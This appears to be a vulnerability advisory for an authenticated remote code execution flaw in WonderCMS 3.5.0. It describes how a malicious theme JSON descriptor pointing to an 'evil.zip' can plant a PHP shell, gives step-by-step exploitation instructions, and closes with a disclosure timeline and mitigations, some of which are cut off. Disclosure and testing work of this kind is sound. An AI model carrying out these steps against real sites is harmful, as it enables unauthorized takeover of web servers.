
Authenticated RCE exploit for WonderCMS 3.5.0 via malicious theme installation. Includes vulnerability mechanics, PoC, and mitigation guidance for security testing and education.
An authenticated Remote Code Execution (RCE) vulnerability exists in WonderCMS v3.5.0.
The issue stems from how the application handles remote theme/module installations via JSON descriptors. When an admin submits a remote JSON file referencing a ZIP archive, its contents are extracted to a web-accessible directory (e.g., /themes/). If the ZIP contains a PHP file, that file becomes accessible over the web and may be executed.
This behavior introduces RCE risk due to:
Note: Admin authentication is required, but default installations expose the admin password publicly (on the homepage), use password-only login, and do not enforce strong auth controls.
WonderCMS will accept and attempt to install remote modules/themes if the submitted JSON descriptor matches the expected wcms-modules.json format. A descriptor that passes the format check (and points to a ZIP archive) will be fetched and its archive contents extracted into a web-accessible directory (e.g., /themes/<name>/) without further validation of file types.
Example descriptor :
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
Warning: Do not run on production systems. Only use authorized test environments.
Obtain the admin password from the publicly exposed homepage of a default WonderCMS installation.
Log in to the admin panel.
Navigate to the theme installation section.
Provide the URL to a malicious JSON descriptor (e.g., hosted on an attacker-controlled server).
Initiate installation. The server will:
Install the downloaded malicious theme.
Access the extracted PHP shell (e.g., http://target.com/themes/<Theme_Name>/shell.php) to execute arbitrary commands.
(Note: Only perform these steps in a controlled test environment. Exploiting this vulnerability on live systems without authorization is illegal.)
The vulnerability was reported to WonderCMS maintainers in July 2025.
The maintainers acknowledged the report but noted that, in their view, this behavior is acceptable for administrators.
To reduce exposure:
themes/ or plugins/ via server configuration.This information is provided for defensive security research and educational purposes. Always get proper authorization before testing or disclosing vulnerabilities.